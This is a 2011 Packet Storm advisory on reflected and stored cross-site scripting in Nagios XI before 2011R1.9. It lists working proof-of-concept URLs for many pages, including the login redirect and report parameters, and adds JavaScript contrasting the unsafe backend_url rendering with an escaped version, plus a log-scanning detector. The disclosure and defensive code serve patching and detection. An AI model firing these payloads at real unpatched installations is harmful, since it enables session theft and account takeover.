Nagios XI Cross Site Scripting

2011-12-15T00:00:00
ID PACKETSTORM:107872
Type packetstorm
Reporter 0a2940
Modified 2011-12-15T00:00:00

Description

                                        
================  
Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9  
  
Author: 0a29406d9794e4f9b30b3c5d6702c708  
  
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940  
================  
Description:  
================  
  
Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this  
list is non-exhaustive, due to the sheer number of issues. Of particular note  
is XSS on the login page, and the ability to pass XSS through the login page,  
using the redirect parameter, e.g.  
http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>  
  
Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in  
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)  
  
================  
Timeline:  
================  
  
16 November 2011 - Reported to Nagios Enterprises  
16 November 2011 - Acknowledged  
13 December 2011 - Nagios XI 2011R1.9 released  
16 December 2011 - Nagios Enterprises report fixed  
16 December 2011 - Public disclosure  
  
================  
Details:  
================  
  
Reflected XSS  
-----  
  
Page: /nagiosxi/login.php  
Variables: -  
PoCs: http://site/nagiosxi/login.php/";alert('0a29');"  
Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe  
manner  
Also affects:  
/nagiosxi/about/index.php  
/nagiosxi/about/main.php  
/nagiosxi/account/main.php  
/nagiosxi/account/notifymethods.php  
/nagiosxi/account/notifymsgs.php  
/nagiosxi/account/notifyprefs.php  
/nagiosxi/account/testnotification.php  
/nagiosxi/help/index.php  
/nagiosxi/help/main.php  
/nagiosxi/includes/components/alertstream/go.php  
/nagiosxi/includes/components/alertstream/index.php  
/nagiosxi/includes/components/hypermap_replay/index.php  
/nagiosxi/includes/components/massacknowledge/mass_ack.php  
/nagiosxi/includes/components/xicore/recurringdowntime.php/  
/nagiosxi/includes/components/xicore/status.php  
/nagiosxi/includes/components/xicore/tac.php  
/nagiosxi/reports/alertheatmap.php  
/nagiosxi/reports/availability.php  
/nagiosxi/reports/eventlog.php  
/nagiosxi/reports/histogram.php  
/nagiosxi/reports/index.php  
/nagiosxi/reports/myreports.php  
/nagiosxi/reports/nagioscorereports.php  
/nagiosxi/reports/notifications.php  
/nagiosxi/reports/statehistory.php  
/nagiosxi/reports/topalertproducers.php  
/nagiosxi/views/index.php  
/nagiosxi/views/main.php  
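
The 'backend_url' flaw described above, next to a hardened form, as an added example that is not Nagios XI source code and not part of the original advisory. The helper names (renderUnsafe, renderSafe, jsStringLiteral, staysData, singleScriptClose) are hypothetical; the two test paths are the PoC paths from this advisory.

```javascript
// Added example: hypothetical helpers, not Nagios XI source code.
// PoC paths copied from this advisory (login.php and recurringdowntime.php).
const POC_PATHS = [
  `/nagiosxi/login.php/";alert('0a29');"`,
  `/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>`,
];

// Vulnerable pattern: the request URL is pasted between quotes inside <script>,
// so a quote in the URL ends the string and "</script>" ends the element.
function renderUnsafe(requestUrl) {
  return '<script>var backend_url = "' + requestUrl + '";</script>';
}

// Hardened pattern: JSON.stringify escapes quotes, backslashes and control
// characters; the replace step also escapes characters that are special to the
// HTML parser or to older JavaScript engines (U+2028/U+2029).
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

function renderSafe(requestUrl) {
  return '<script>var backend_url = ' + jsStringLiteral(requestUrl) + ';</script>';
}

// True when the emitted literal evaluates to exactly the original text,
// i.e. the whole input stayed data inside one string.
function staysData(value) {
  return new Function('return ' + jsStringLiteral(value) + ';')() === value;
}

// True when "</script>" appears only once, as the template's own closing tag.
function singleScriptClose(html) {
  return html.indexOf('</script>') === html.length - '</script>'.length;
}

for (const p of POC_PATHS) {
  console.log(staysData(p), singleScriptClose(renderSafe(p)), renderSafe(p));
}
```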
  
Page: /nagiosxi/account/  
Variables: xiwindow  
PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script>  
  
Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php  
Variables: -  
PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script>  
  
Page: /nagiosxi/includes/components/xicore/status.php  
Variables: hostgroup, style  
PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script>  
http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>  
  
Page: /nagiosxi/includes/components/xicore/recurringdowntime.php  
Variables: -  
PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>  
  
  
Page: /nagiosxi/reports/alertheatmap.php  
Variables: height, host, service, width  
PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/histogram.php  
Variable: service  
PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/notifications.php  
Variables: host, service  
PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/statehistory.php  
Variables: host, service  
PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>  
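
A log-triage check for the request shapes listed in this section (markup characters in the extra path after a .php script, in a query parameter, or nested inside the login page's redirect parameter), as an added example that is not part of the original advisory. The function names and the sample log lines are constructed for illustration, and the check is a heuristic that can flag legitimate values containing quotes.

```javascript
// Added example: triage heuristic, not a Nagios XI or vendor tool.
// SAMPLE_LOG is constructed for illustration (combined-log style, documentation IPs).
const SAMPLE_LOG = [
  `192.0.2.10 - - [16/Dec/2011:10:00:01 +0000] "GET /nagiosxi/reports/histogram.php?service=PING HTTP/1.1" 200 5120`,
  `192.0.2.44 - - [16/Dec/2011:10:02:13 +0000] "GET /nagiosxi/login.php/%22;alert('0a29');%22 HTTP/1.1" 200 3310`,
  `192.0.2.44 - - [16/Dec/2011:10:02:40 +0000] "GET /nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service=%22%3E%3Cscript%3Ealert(%220a29%22)%3C/script%3E HTTP/1.1" 200 3310`,
  `192.0.2.10 - - [16/Dec/2011:10:05:00 +0000] "GET /nagiosxi/reports/alertheatmap.php?width=600&height=400 HTTP/1.1" 200 8001`,
];

const MARKUP = /[<>"']/; // characters the advisory's PoCs use to break out

// Decode repeatedly so payloads nested inside another parameter are visible.
function fullyDecode(text) {
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(text.replace(/\+/g, ' ')); } catch { return text; }
    if (next === text) break;
    text = next;
  }
  return text;
}

function inspectTarget(target) {
  const findings = [];
  const q = target.indexOf('?');
  const path = q === -1 ? target : target.slice(0, q);
  const query = q === -1 ? '' : target.slice(q + 1);
  // Extra path after "script.php/" reaches the script as PATH_INFO.
  const extra = /\.php\/(.+)$/.exec(path);
  if (extra && MARKUP.test(fullyDecode(extra[1]))) findings.push('path-info');
  for (const pair of query.split('&').filter(Boolean)) {
    const eq = pair.indexOf('=');
    const name = eq === -1 ? pair : pair.slice(0, eq);
    if (eq !== -1 && MARKUP.test(fullyDecode(pair.slice(eq + 1)))) findings.push('param:' + name);
  }
  return findings;
}

// Returns [{ line, findings }] for log lines whose request target is suspicious.
function scanLog(lines) {
  const hits = [];
  lines.forEach((entry, i) => {
    const m = /"[A-Z]+ (\S+) HTTP\/[\d.]+"/.exec(entry);
    const findings = m ? inspectTarget(m[1]) : [];
    if (findings.length) hits.push({ line: i + 1, findings });
  });
  return hits;
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG)));
```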
  
  
Stored XSS  
-----  
  
Page: /nagiosxi/reports/myreports.php  
Variable: title  
Details: It is possible to store XSS within 'My Reports'; however, it is believed  
this is only viewable by the logged-in user.  
1) View a report and save it, e.g.  
http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D  
2) Name the report with XSS, e.g. "><script>alert("0a29")</script>  